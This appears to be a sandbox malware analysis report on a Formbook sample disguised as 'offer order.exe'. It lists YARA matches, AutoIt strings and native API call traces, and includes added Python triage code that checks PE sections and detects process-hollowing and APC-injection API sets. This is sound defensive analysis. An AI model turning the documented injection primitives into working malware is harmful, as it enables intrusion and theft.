          Source: 0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.359207981.00000000017F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.359207981.00000000017F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.343417017.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.343417017.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.344627421.0000000001710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.344627421.0000000001710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.356195697.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.356195697.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.344721716.0000000001740000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.344721716.0000000001740000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.494578696.0000000002BC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.494578696.0000000002BC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.492758749.0000000000B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.492758749.0000000000B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.491918579.0000000000990000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.491918579.0000000000990000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 22.2.igfxCUIService.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.2.igfxCUIService.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 22.2.igfxCUIService.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.2.igfxCUIService.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 12.2.offer order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.2.offer order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 12.2.offer order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.2.offer order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          AutoIt script contains suspicious strings
          Source: offer order.exe | AutoIt Script: EN LOCAL $ZPEPOD = DLLCALLADDRESS ("dword" , $Z56D565
          Source: igfxCUIService.exe.0.dr | AutoIt Script: EN LOCAL $ZPEPOD = DLLCALLADDRESS ("dword" , $Z56D565
          Binary is likely a compiled AutoIt script file
          Source: offer order.exe, 00000000.00000000.225143786.0000000000E75000.00000002.00020000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: offer order.exe, 00000000.00000000.225143786.0000000000E75000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: igfxCUIService.exe, 00000006.00000000.254238012.00000000000F5000.00000002.00020000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: igfxCUIService.exe, 00000006.00000000.254238012.00000000000F5000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: offer order.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: offer order.exe, 0000000C.00000000.281173325.0000000000E75000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: igfxCUIService.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: igfxCUIService.exe, 00000016.00000000.329321796.00000000000F5000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: wlanext.exe, 00000017.00000002.498168096.0000000003A24000.00000004.00000001.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: wlanext.exe, 00000017.00000002.498168096.0000000003A24000.00000004.00000001.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: offer order.exe
          PE file has a writeable .text section
          Source: offer order.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: igfxCUIService.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
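          The two static findings above (the "compiled AutoIt script" marker string and a .text section carrying IMAGE_SCN_MEM_WRITE) can be reproduced without the sandbox. The following is an added example, not Joe Sandbox code and not part of the report: it walks the PE headers by hand, names the section flags the way the report prints them, and scans for the AutoIt runtime marker. The minimal PE it builds for the demonstration is constructed here and is not the analysed sample. Note the caveat the report itself hedges with ("likely"): the marker belongs to the AutoIt3 interpreter stub, so every AutoIt-compiled program, benign or not, carries it; it identifies the packaging, not the behaviour.

```python
import struct

# Section Characteristics bits from winnt.h, in the order the report lists them
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
FLAG_NAMES = [
    (IMAGE_SCN_MEM_EXECUTE, "IMAGE_SCN_MEM_EXECUTE"),
    (IMAGE_SCN_MEM_WRITE, "IMAGE_SCN_MEM_WRITE"),
    (IMAGE_SCN_CNT_CODE, "IMAGE_SCN_CNT_CODE"),
    (IMAGE_SCN_MEM_READ, "IMAGE_SCN_MEM_READ"),
]

# Literal string the sandbox found in the sample and its dropped copies.
# It is part of the AutoIt3 runtime stub: it proves "compiled AutoIt",
# not "malicious".
AUTOIT_MARKER = b"This is a third-party compiled AutoIt script."


def parse_sections(data: bytes):
    """Return [(name, characteristics)] by walking DOS header -> PE signature
    -> COFF file header -> section table. Raises ValueError for a non-PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_of_optional          # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40                       # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\x00").decode("ascii", "replace")
        characteristics = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, characteristics))
    return sections


def flag_names(characteristics: int):
    """Render a Characteristics value the way the report does."""
    return [name for bit, name in FLAG_NAMES if characteristics & bit]


def writable_code_sections(data: bytes):
    """Names of sections that are executable AND writable. Normal compiler
    output marks .text READ|EXECUTE; W+X code is typical of packers and
    self-patching stubs and is exactly what the sandbox flagged above."""
    return [name for name, ch in parse_sections(data)
            if ch & IMAGE_SCN_MEM_EXECUTE and ch & IMAGE_SCN_MEM_WRITE]


def has_autoit_marker(data: bytes) -> bool:
    """True if the AutoIt runtime marker appears anywhere in the file."""
    return AUTOIT_MARKER in data


def triage(data: bytes) -> dict:
    """Both static checks in one call; feed it open(path, 'rb').read()."""
    return {"wx_sections": writable_code_sections(data),
            "compiled_autoit": has_autoit_marker(data)}


def build_minimal_pe(text_characteristics: int, payload: bytes) -> bytes:
    """Constructed PE32 with a single .text section (NOT the real sample),
    so the checks above can be exercised offline."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 0xE0, 0x0102)
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, 0x10B)               # PE32 magic
    raw_offset = 0x200
    section = struct.pack("<8sIIIIIIHHI", b".text", len(payload), 0x1000,
                          len(payload), raw_offset, 0, 0, 0, 0,
                          text_characteristics)
    header = bytes(dos) + b"PE\x00\x00" + coff + bytes(optional) + section
    return header.ljust(raw_offset, b"\x00") + payload


if __name__ == "__main__":
    wx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    sample = build_minimal_pe(wx, AUTOIT_MARKER)
    print(".text flags:", ", ".join(flag_names(wx)))
    print(triage(sample))
```

          Run triage() over both the submitted file and the dropped igfxCUIService.exe copy; matching results on both confirm the dropped file is the same packaged binary rather than a second-stage payload.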
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00419850 NtCreateFile
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00419900 NtReadFile
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00419980 NtClose
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00419A30 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_004198FA NtReadFile
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_0041997A NtClose
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00419A2A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9B00 NtSetValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9770 NtSetInformationFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9610 NtEnumerateValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F96D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9560 NtWriteFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F95D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032FA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032FB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032FA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032FA770 NtOpenThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032FAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_009A9850 NtCreateFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_009A9980 NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_009A9900 NtReadFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_009A9A30 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_009A98FA NtReadFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_009A997A NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_009A9A2A NtAllocateVirtualMemory
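          Read as a set rather than one row at a time, the Nt* stubs above tell an analyst which process carries which injection capability: the code injected into wlanext.exe (pid 23) has NtUnmapViewOfSection, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread together, while the offer order.exe rows (pid 12) show only file and allocation primitives. The following is an added example, not Joe Sandbox code and not from the report's author: it parses rows of this listing (a subset copied from the rows above, embedded here in a normalised "Source ... | Code function ..." form) and reports, per process, which injection primitive sets are complete. The grouping of APIs into "process hollowing" and "APC injection" is this example's own assumption. A complete set is a capability, not proof of execution; the behavioural signatures at the top of the report (process hollowing, APC queued in another process) are what confirm it was used.

```python
import re
from collections import defaultdict

# Constructed subset of the report rows above, for pid 12 (offer order.exe)
# and pid 23 (wlanext.exe). The parser also accepts the raw extraction form
# where the path runs straight into "Code function:" and the address is
# repeated after the call list.
REPORT_ROWS = r"""
Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00419850 NtCreateFile
Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00419900 NtReadFile
Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00419980 NtClose
Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00419A30 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032FA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9A20 NtResumeThread
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032F97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032FAD30 NtSetContextThread
""".strip().splitlines()

ROW_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<pid>\d+)_2_(?P<addr>[0-9A-Fa-f]+)\s+(?P<calls>[\w,]+)"
)

# Assumed primitive sets (this example's grouping, not the report's):
# all members must be present for a "complete" match.
INJECTION_PRIMITIVES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtAllocateVirtualMemory",
                          "NtWriteVirtualMemory", "NtSetContextThread",
                          "NtResumeThread"},
    "APC injection": {"NtQueueApcThread", "NtWriteVirtualMemory"},
}


def api_calls_by_process(rows):
    """Map pid -> {'source': path, 'apis': set of API names} from report rows."""
    procs = defaultdict(lambda: {"source": None, "apis": set()})
    for row in rows:
        m = ROW_RE.search(row)
        if not m:
            continue
        pid = int(m.group("pid"))
        procs[pid]["source"] = m.group("src")
        for tok in m.group("calls").split(","):
            # Keep identifiers only; this drops the "12_2_..." link residue
            # that the raw extraction appends after the call list.
            if re.fullmatch(r"[A-Za-z_]\w*", tok):
                procs[pid]["apis"].add(tok)
    return dict(procs)


def injection_indicators(rows):
    """Per pid: techniques whose whole primitive set is present ('complete')
    and, for partially present sets, which APIs are still missing ('partial')."""
    result = {}
    for pid, info in api_calls_by_process(rows).items():
        complete, partial = [], {}
        for technique, needed in INJECTION_PRIMITIVES.items():
            missing = sorted(needed - info["apis"])
            if not missing:
                complete.append(technique)
            elif len(missing) < len(needed):
                partial[technique] = missing
        result[pid] = {"source": info["source"],
                       "complete": sorted(complete), "partial": partial}
    return result


if __name__ == "__main__":
    for pid, verdict in sorted(injection_indicators(REPORT_ROWS).items()):
        print(pid, verdict["source"], "complete:", verdict["complete"],
              "partial:", verdict["partial"])
```

          Feeding the full listing (all pid 12, 22 and 23 rows) through injection_indicators() is the quick way to confirm that the hollowing primitives live in the payload mapped into wlanext.exe and not in the AutoIt host.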
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E240B1: CreateFileW,_memset,DeviceIoControl,CloseHandle
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E18858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000A545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_0041D80C
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00401027
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00401030
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_0041D141
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00401176
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_0041C9D9
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_0041CC95
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00402D88
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00402D90
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_0041DF0C
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00409F80
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00402FB0
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E4804A
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00DCE060
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00DD4140
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00DE2405
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00DF6522
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E40665
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00DF267E
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00DD6843
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00DCE800
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00DE283A
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00DF89DF
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E40AE2
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00DF6A94
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00DD8A0E
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E1EB07
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E28B13
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00DECD61
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000C804A
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_0004E060
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_00054140
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_00062405
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_00076522
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000C0665
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_0007267E
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_0004E800
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_0006283A
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_00056843
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000789DF
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_00058A0E
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_00076A94
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000C0AE2
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_0009EB07
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000A8B13
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_0006CD61
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_00077006
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_0005710E
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_00053190
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_00041287
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000633C7
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_0006F419
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_03382B28
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032DA309
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032DAB40
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_0335CB4F
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032EEBB0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032E138B
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_033623E3
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_0337DBD2
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_033703DA
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032EABD8
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032DB236
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_0336FA2B
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_033822AE
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_03374AEF
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032D4120
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032BF900
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032D99BF
